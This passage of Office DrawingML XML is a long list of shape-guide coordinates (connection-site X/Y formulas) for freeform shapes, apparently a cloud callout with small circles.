                <a:gd name="connsiteY2-734" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-735" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-736" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-737" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-738" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-739" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-740" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-741" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-742" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-743" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-744" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-745" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-746" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-747" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-748" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-749" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-750" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-751" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-752" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-753" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-754" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-755" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-756" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-757" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-758" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-759" fmla="*/ 41834 w 44692"/>
                <a:gd name="connsiteY10-760" fmla="*/ 15213 h 76558"/>
                <a:gd name="connsiteX11-761" fmla="*/ 40386 w 44692"/>
                <a:gd name="connsiteY11-762" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-763" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-764" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-765" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-766" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-767" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-768" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-769" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-770" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-771" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-772" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-773" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-774" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-775" fmla="*/ 14036 w 44692"/>
                <a:gd name="connsiteY18-776" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-777" fmla="*/ 15336 w 44692"/>
                <a:gd name="connsiteY19-778" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-779" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-780" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-781" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-782" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-783" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-784" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-785" fmla="*/ 5659 w 44692"/>
                <a:gd name="connsiteY1-786" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-787" fmla="*/ 14041 w 44692"/>
                <a:gd name="connsiteY2-788" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-789" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-790" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-791" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-792" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-793" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-794" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-795" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-796" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-797" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-798" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-799" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-800" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-801" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-802" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-803" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-804" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-805" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-806" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-807" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-808" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-809" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-810" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-811" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-812" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-813" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-814" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-815" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-816" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-817" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-818" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-819" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-820" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-821" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-822" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-823" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-824" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-825" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-826" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-827" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-828" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-829" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-830" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-831" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-832" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-833" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-834" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-835" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-836" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-837" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-838" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-839" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-840" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-841" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-842" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-843" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-844" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-845" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-846" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-847" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-848" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-849" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-850" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-851" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-852" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-853" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-854" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-855" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-856" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-857" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-858" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-859" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-860" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-861" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-862" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-863" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-864" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-865" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-866" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-867" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-868" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-869" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-870" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-871" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-872" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-873" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-874" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-875" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-876" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-877" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-878" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-879" fmla="*/ 40386 w 44692"/>
                <a:gd name="connsiteY11-880" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-881" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-882" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-883" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-884" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-885" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-886" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-887" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-888" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-889" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-890" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-891" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-892" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-893" fmla="*/ 14036 w 44692"/>
                <a:gd name="connsiteY18-894" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-895" fmla="*/ 15336 w 44692"/>
                <a:gd name="connsiteY19-896" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-897" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-898" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-899" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-900" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-901" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-902" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-903" fmla="*/ 5659 w 44692"/>
                <a:gd name="connsiteY1-904" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-905" fmla="*/ 14041 w 44692"/>
                <a:gd name="connsiteY2-906" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-907" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-908" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-909" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-910" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-911" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-912" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-913" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-914" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-915" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-916" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-917" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-918" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-919" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-920" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-921" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-922" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-923" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-924" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-925" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-926" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-927" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-928" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-929" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-930" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-931" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-932" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-933" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-934" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-935" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-936" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-937" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-938" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-939" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-940" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-941" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-942" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-943" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-944" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-945" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-946" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-947" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-948" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-949" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-950" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-951" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-952" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-953" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-954" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-955" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-956" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-957" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-958" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-959" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-960" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-961" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-962" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-963" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-964" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-965" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-966" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-967" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-968" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-969" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-970" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-971" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-972" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-973" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-974" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-975" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-976" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-977" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-978" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-979" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-980" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-981" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-982" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-983" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-984" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-985" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-986" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-987" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-988" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-989" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-990" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-991" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-992" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-993" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-994" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-995" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-996" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-997" fmla="*/ 42478 w 44692"/>
                <a:gd name="connsiteY11-998" fmla="*/ 17189 h 76558"/>
                <a:gd name="connsiteX12-999" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-1000" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-1001" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-1002" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-1003" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-1004" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-1005" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-1006" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-1007" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-1008" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-1009" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-1010" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-1011" fmla="*/ 14036 w 44692"/>
                <a:gd name="connsiteY18-1012" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-1013" fmla="*/ 15336 w 44692"/>
                <a:gd name="connsiteY19-1014" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-1015" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-1016" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-1017" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1018" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1019" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-1020" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-1021" fmla="*/ 5659 w 44692"/>
                <a:gd name="connsiteY1-1022" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-1023" fmla="*/ 14041 w 44692"/>
                <a:gd name="connsiteY2-1024" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-1025" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-1026" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-1027" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-1028" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-1029" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-1030" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-1031" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-1032" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-1033" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-1034" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-1035" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-1036" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-1037" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-1038" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-1039" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-1040" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-1041" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-1042" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-1043" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-1044" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-1045" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-1046" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-1047" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-1048" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-1049" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-1050" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-1051" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-1052" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-1053" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-1054" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-1055" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-1056" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-1057" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-1058" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-1059" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-1060" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-1061" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1062" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1063" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-1064" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-1065" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-1066" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-1067" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-1068" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-1069" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-1070" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-1071" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-1072" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-1073" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-1074" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-1075" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-1076" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-1077" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-1078" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-1079" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-1080" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-1081" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-1082" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-1083" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-1084" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-1085" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-1086" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-1087" fmla="*/ 618121 w 2066053"/>
                <a:gd name="connsiteY2-1088" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-1089" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY3-1090" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-1091" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY4-1092" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-1093" fmla="*/ 4729 w 44692"/>
                <a:gd name="connsiteY0-1094" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-1095" fmla="*/ 2196 w 44692"/>
                <a:gd name="connsiteY1-1096" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-1097" fmla="*/ 6964 w 44692"/>
                <a:gd name="connsiteY2-1098" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-1099" fmla="*/ 5856 w 44692"/>
                <a:gd name="connsiteY3-1100" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-1101" fmla="*/ 16514 w 44692"/>
                <a:gd name="connsiteY4-1102" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-1103" fmla="*/ 15846 w 44692"/>
                <a:gd name="connsiteY5-1104" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-1105" fmla="*/ 29814 w 44692"/>
                <a:gd name="connsiteY6-1106" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-1107" fmla="*/ 28406 w 44692"/>
                <a:gd name="connsiteY7-1108" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-1109" fmla="*/ 34165 w 44692"/>
                <a:gd name="connsiteY8-1110" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-1111" fmla="*/ 39698 w 44692"/>
                <a:gd name="connsiteY9-1112" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-1113" fmla="*/ 43546 w 44692"/>
                <a:gd name="connsiteY10-1114" fmla="*/ 15563 h 76558"/>
                <a:gd name="connsiteX11-1115" fmla="*/ 42478 w 44692"/>
                <a:gd name="connsiteY11-1116" fmla="*/ 17189 h 76558"/>
                <a:gd name="connsiteX12-1117" fmla="*/ 38360 w 44692"/>
                <a:gd name="connsiteY12-1118" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-1119" fmla="*/ 38436 w 44692"/>
                <a:gd name="connsiteY13-1120" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-1121" fmla="*/ 29114 w 44692"/>
                <a:gd name="connsiteY14-1122" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-1123" fmla="*/ 29856 w 44692"/>
                <a:gd name="connsiteY15-1124" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-1125" fmla="*/ 22177 w 44692"/>
                <a:gd name="connsiteY16-1126" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-1127" fmla="*/ 22536 w 44692"/>
                <a:gd name="connsiteY17-1128" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-1129" fmla="*/ 12134 w 44692"/>
                <a:gd name="connsiteY18-1130" fmla="*/ 2252 h 76558"/>
                <a:gd name="connsiteX19-1131" fmla="*/ 15336 w 44692"/>
                <a:gd name="connsiteY19-1132" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-1133" fmla="*/ 4163 w 44692"/>
                <a:gd name="connsiteY20-1134" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-1135" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-1136" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-1137" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-1138" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-1139" fmla="*/ 5469 w 44692"/>
                <a:gd name="connsiteY1-1140" fmla="*/ 3267 h 76558"/>
                <a:gd name="connsiteX2-1141" fmla="*/ 14041 w 44692"/>
